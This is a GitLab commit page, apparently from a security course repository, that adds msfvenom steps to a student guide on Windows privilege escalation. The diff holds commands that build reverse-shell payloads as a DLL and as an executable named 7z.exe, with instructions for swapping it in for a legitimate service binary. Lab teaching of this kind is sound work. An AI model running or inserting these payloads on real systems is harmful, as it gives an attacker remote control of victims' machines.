UNCLASSIFIED

Skip to content
Snippets Groups Projects
Commit 03cffc0f authored by Bryan Gagne's avatar Bryan Gagne
Browse files

Merge branch 'rocky.z.wilson-master-patch-27459' into 'master'

Adding MSFVenom Solutions to Student Guide

See merge request sec/public!65
parents 0a18cd83 2fb0d130
No related merge requests found
Pipeline #83881 passed with stages
in 1 minute and 28 seconds
......@@ -377,6 +377,9 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
Once the malicious dll has been createdit must be uploaded to the host. Use scp, ftp, nc, python simple HTTP server, or copying and pasting base64 dump of file.
. Alternative method for DLL creation using MSFVenom
* ``msfvenom -p windows/shell_reverse_tcp LHOST=10.50.x.x LPORT=4444 -f dll > bad.dll``
*Transfering the DLL* +
Once the malicious dll has been created, it must be uploaded to the host. Use of ``scp``, ``ftp``, ``nc``, ``python simple HTTP server``, or ``copying base64 output``.
......@@ -452,6 +455,8 @@ NOTE: We are interested in binaries running as *SYSTEM* in locations where *BUIL
*Exploiting a vulnerable Service* +
The overall intent is to replace the legitimate service with an executable that will allow an attacker to accomplish their objective.
. (Optional) Create a malicious executable file via MSFVenom
*`` msfvenom -p windows/shell_reverse_tcp LHOST=10.50.x.x LPORT=4444 -f exe > 7z.exe
. Create a backup copy of 7z.exe
* `` copy 7z.exe 7z.blk.exe``
. Copy a malicious executable into 7z.exe old location
......
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment